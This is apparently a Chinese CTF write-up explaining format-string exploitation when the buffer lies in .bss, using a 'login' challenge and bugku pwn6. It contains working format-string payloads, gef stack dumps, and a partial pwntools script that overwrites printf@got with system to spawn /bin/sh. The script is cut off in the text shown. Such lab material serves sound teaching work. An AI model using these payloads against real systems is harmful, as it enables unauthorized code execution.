-
-
[原创]攻击格式化字符串在.bss段的程序(bugku-pwn6)
-
发表于: 2021-5-28 12:47 15324
-
以login这道题为例,详细讲解下做这种题的思路。
查看保护:
很明显最后的函数中有典型的格式化字符串漏洞:
但buf在.bss段上,所以不能用自动化工具来打:
我们利用字符串格式化漏洞攻击got表,将printf修改成为system,然后之后循环中输入/bin/sh
就可以完成利用:
首先查看调用printf时的栈情况:
用这样的字符串可以泄露栈和libc的地址:
之后利用栈中指向栈数据的数据来构造攻击链:
因为要一次性写两个两字节的数据,需要两个地址,自然需要两条链条。构造链条代码如下:
可以看到利用构造的两条链条,printf已经被改成了system,以下是全部脚本:
以及攻击效果:
以bugku平台的pwn6为例,拿到文件后查看下信息:
有pie保护那么需要泄露main,libc的地址。
第一个函数中有缓冲区溢出风险:
而控制循环的变量正好位于其下方:
第二个函数里有格式化字符串漏洞:
尽管程序会对字符串进行移位操作:
并且buf不在栈上:
但如果在栈中构造好两个链条,还是有机会利用这个漏洞劫持printf@got。
第三个函数中有strcpy,存在栈溢出的风险:
可以用来将一些值部署在栈中。
第二个函数开辟了很多栈空间,而且并没有初始化栈空间的值:
这使得部分部署好的值不会被抹去(记得一定要初始化变量)
据此,此题的解题思路如下:
在调试中确定栈中情况:
转到函数二时栈情况如下:
此处笔者选择将栈顶和保存rbp的地址填充为printf@got+2和printf@got。
全部脚本如下:
运行效果:
通过本文中的练习,可以总结以下三点:
dc@ubuntu:~
/
playground$
file
.
/
login
.
/
login: ELF
32
-
bit LSB executable, Intel
80386
, version
1
(SYSV), dynamically linked, interpreter
/
lib
/
ld
-
linux.so.
2
,
for
GNU
/
Linux
2.6
.
32
, BuildID[sha1]
=
dbbf329da12ebdd87dcae5d032eda61796f7d0c3, stripped
dc@ubuntu:~
/
playground$ pwn checksec login
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
dc@ubuntu:~
/
playground$
file
.
/
login
.
/
login: ELF
32
-
bit LSB executable, Intel
80386
, version
1
(SYSV), dynamically linked, interpreter
/
lib
/
ld
-
linux.so.
2
,
for
GNU
/
Linux
2.6
.
32
, BuildID[sha1]
=
dbbf329da12ebdd87dcae5d032eda61796f7d0c3, stripped
dc@ubuntu:~
/
playground$ pwn checksec login
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
int
__cdecl main()
{
setbuf(stdin,
0
);
setbuf(stdout,
0
);
setbuf(stderr,
0
);
puts(
"Please input your name: "
);
read(
0
, byte_804B080,
0xCu
);
puts(
"Base maybe not easy......"
);
return
sub_80485E3();
}
int
sub_80485E3()
{
printf(
"hello, %s"
, byte_804B080);
return
sub_804854B();
}
int
sub_804854B()
{
puts(
"Please input your password: "
);
while
(
1
)
{
s1[read(
0
, s1,
0x32u
)]
=
0
;
if
( !strncmp(s1,
"wllmmllw"
,
8u
) )
break
;
printf(
"This is the wrong password: "
);
printf(s1);
puts(
"Try again!"
);
}
return
puts(
"Login successfully! Have fun!"
);
}
int
__cdecl main()
{
setbuf(stdin,
0
);
setbuf(stdout,
0
);
setbuf(stderr,
0
);
puts(
"Please input your name: "
);
read(
0
, byte_804B080,
0xCu
);
puts(
"Base maybe not easy......"
);
return
sub_80485E3();
}
int
sub_80485E3()
{
printf(
"hello, %s"
, byte_804B080);
return
sub_804854B();
}
int
sub_804854B()
{
puts(
"Please input your password: "
);
while
(
1
)
{
s1[read(
0
, s1,
0x32u
)]
=
0
;
if
( !strncmp(s1,
"wllmmllw"
,
8u
) )
break
;
printf(
"This is the wrong password: "
);
printf(s1);
puts(
"Try again!"
);
}
return
puts(
"Login successfully! Have fun!"
);
}
printf(s1);
printf(s1);
.bss:
0804B0A0
s1 db ? ; DATA XREF: sub_804854B
+
1B
↑o
.bss:
0804B0A0
s1 db ? ; DATA XREF: sub_804854B
+
1B
↑o
printf(s1);
-
-
-
-
-
-
-
-
-
after attack
-
-
-
-
-
-
-
-
-
>
system(
'/bin/sh'
);
printf(s1);
-
-
-
-
-
-
-
-
-
after attack
-
-
-
-
-
-
-
-
-
>
system(
'/bin/sh'
);
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
─────────────────────────────────────────────────────────────── code:x86:
32
────
0x80485a4
add esp,
0x10
0x80485a7
sub esp,
0xc
0x80485aa
push
0x804b0a0
→
0x80485af
call
0x8048400
<printf@plt>
↳
0x8048400
<printf@plt
+
0
> jmp DWORD PTR ds:
0x804b014
0x8048406
<printf@plt
+
6
> push
0x10
0x804840b
<printf@plt
+
11
> jmp
0x80483d0
0x8048410
<puts@plt
+
0
> jmp DWORD PTR ds:
0x804b018
0x8048416
<puts@plt
+
6
> push
0x18
0x804841b
<puts@plt
+
11
> jmp
0x80483d0
─────────────────────────────────────────────────────── arguments (guessed) ────
printf@plt (
[sp
+
0x0
]
=
0x0804b0a0
→
"%42988c%6$hn"
,
[sp
+
0x4
]
=
0x08048dae
→
"wllmmllw"
,
[sp
+
0x8
]
=
0x00000008
,
[sp
+
0xc
]
=
0x080485fb
→ add esp,
0x10
,
[sp
+
0x10
]
=
0x08048dfd
→
"hello, %s"
)
─────────────────────────────────────────────────────────────────── threads ────
[
#0] Id 1, Name: "login", stopped 0x80485af in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[
#0] 0x80485af → call 0x8048400 <printf@plt>
[
#1] 0x8048603 → nop
[
#2] 0x8048689 → nop
[
#3] 0xf7dc1647 → __libc_start_main()
[
#4] 0x8048471 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤ dereference $esp
20
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
0xffc6a7f0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xffc6a7f4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7f8
│
+
0x0028
:
0xffc6a808
→
0x00000000
0xffc6a7fc
│
+
0x002c
:
0x08048689
→ nop
0xffc6a800
│
+
0x0030
:
0xf7f5c3dc
→
0xf7f5d1e0
→
0x00000000
0xffc6a804
│
+
0x0034
:
0xffc6a820
→
0x00000001
0xffc6a808
│
+
0x0038
:
0x00000000
0xffc6a80c
│
+
0x003c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
0xffc6a810
│
+
0x0040
:
0xf7f5c000
→
0x001b2db0
0xffc6a814
│
+
0x0044
:
0xf7f5c000
→
0x001b2db0
0xffc6a818
│
+
0x0048
:
0x00000000
0xffc6a81c
│
+
0x004c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
─────────────────────────────────────────────────────────────── code:x86:
32
────
0x80485a4
add esp,
0x10
0x80485a7
sub esp,
0xc
0x80485aa
push
0x804b0a0
→
0x80485af
call
0x8048400
<printf@plt>
↳
0x8048400
<printf@plt
+
0
> jmp DWORD PTR ds:
0x804b014
0x8048406
<printf@plt
+
6
> push
0x10
0x804840b
<printf@plt
+
11
> jmp
0x80483d0
0x8048410
<puts@plt
+
0
> jmp DWORD PTR ds:
0x804b018
0x8048416
<puts@plt
+
6
> push
0x18
0x804841b
<puts@plt
+
11
> jmp
0x80483d0
─────────────────────────────────────────────────────── arguments (guessed) ────
printf@plt (
[sp
+
0x0
]
=
0x0804b0a0
→
"%42988c%6$hn"
,
[sp
+
0x4
]
=
0x08048dae
→
"wllmmllw"
,
[sp
+
0x8
]
=
0x00000008
,
[sp
+
0xc
]
=
0x080485fb
→ add esp,
0x10
,
[sp
+
0x10
]
=
0x08048dfd
→
"hello, %s"
)
─────────────────────────────────────────────────────────────────── threads ────
[
#0] Id 1, Name: "login", stopped 0x80485af in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[
#0] 0x80485af → call 0x8048400 <printf@plt>
[
#1] 0x8048603 → nop
[
#2] 0x8048689 → nop
[
#3] 0xf7dc1647 → __libc_start_main()
[
#4] 0x8048471 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤ dereference $esp
20
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
0xffc6a7f0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xffc6a7f4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7f8
│
+
0x0028
:
0xffc6a808
→
0x00000000
0xffc6a7fc
│
+
0x002c
:
0x08048689
→ nop
0xffc6a800
│
+
0x0030
:
0xf7f5c3dc
→
0xf7f5d1e0
→
0x00000000
0xffc6a804
│
+
0x0034
:
0xffc6a820
→
0x00000001
0xffc6a808
│
+
0x0038
:
0x00000000
0xffc6a80c
│
+
0x003c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
0xffc6a810
│
+
0x0040
:
0xf7f5c000
→
0x001b2db0
0xffc6a814
│
+
0x0044
:
0xf7f5c000
→
0x001b2db0
0xffc6a818
│
+
0x0048
:
0x00000000
0xffc6a81c
│
+
0x004c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
payload1
=
'\n%6$p\n%15$p\n'
payload1
=
'\n%6$p\n%15$p\n'
0xffc6a7f8
(栈中)
-
>
0xffc6a808
(栈中)
-
> 栈中(printf@got)
-
> printf
0xffc6a7f8
(栈中)
-
>
0xffc6xxxx
(栈中)
-
> 栈中(printf@got
+
2
)
0xffc6a7f8
(栈中)
-
>
0xffc6a808
(栈中)
-
> 栈中(printf@got)
-
> printf
0xffc6a7f8
(栈中)
-
>
0xffc6xxxx
(栈中)
-
> 栈中(printf@got
+
2
)
def
DoubSzWt(number,deviation):
payload
=
'%'
+
str
(number)
+
'c%'
+
str
(deviation)
+
'$hn'
return
payload
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54700c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5c8
→
0x00000000
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5c8
→
0x00000000
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45076c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x08048603
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x08048603
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54716c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45078c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x08048689
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x08048689
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%48560c%7$hn%14899c%11$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e4
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
payload
=
'%'
+
str
(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"/bin/sh"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e3bdb0
→ <system
+
0
> sub esp,
0xc
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e3
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
def
DoubSzWt(number,deviation):
payload
=
'%'
+
str
(number)
+
'c%'
+
str
(deviation)
+
'$hn'
return
payload
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54700c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5c8
→
0x00000000
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5c8
→
0x00000000
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45076c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x08048603
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x08048603
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54716c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45078c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x08048689
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x08048689
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%48560c%7$hn%14899c%11$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e4
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
payload
=
'%'
+
str
(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"/bin/sh"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e3bdb0
→ <system
+
0
> sub esp,
0xc
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e3
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
from
pwn
import
*
#from LibcSearcher import LibcSearcher
#p=remote('108.160.139.79',9090)
p
=
process(
'./login'
)
elf
=
ELF(
'./login'
)
libc
=
ELF(
'/lib/i386-linux-gnu/libc.so.6'
)
#context.log_level="debug"
p.sendafter(
'your name: '
,
'ad'
)
payload1
=
'\n%6$p\n%15$p\n'
p.sendafter(
'Please input your password: \n'
,payload1)
def
DoubSzWt(number,deviation):
payload
=
'%'
+
str
(number)
+
'c%'
+
str
(deviation)
+
'$hn'
return
payload
p.recvuntil(
'0x'
)
stack_addr
=
int
(p.recv(
8
),
16
)
p.recvuntil(
'0x'
)
libc_main_addr
=
int
(p.recv(
8
),
16
)
-
247
print
"libc_main_addr=>"
,
hex
(libc_main_addr)
'''libc=LibcSearcher('__libc_start_main',libc_main_addr)'''
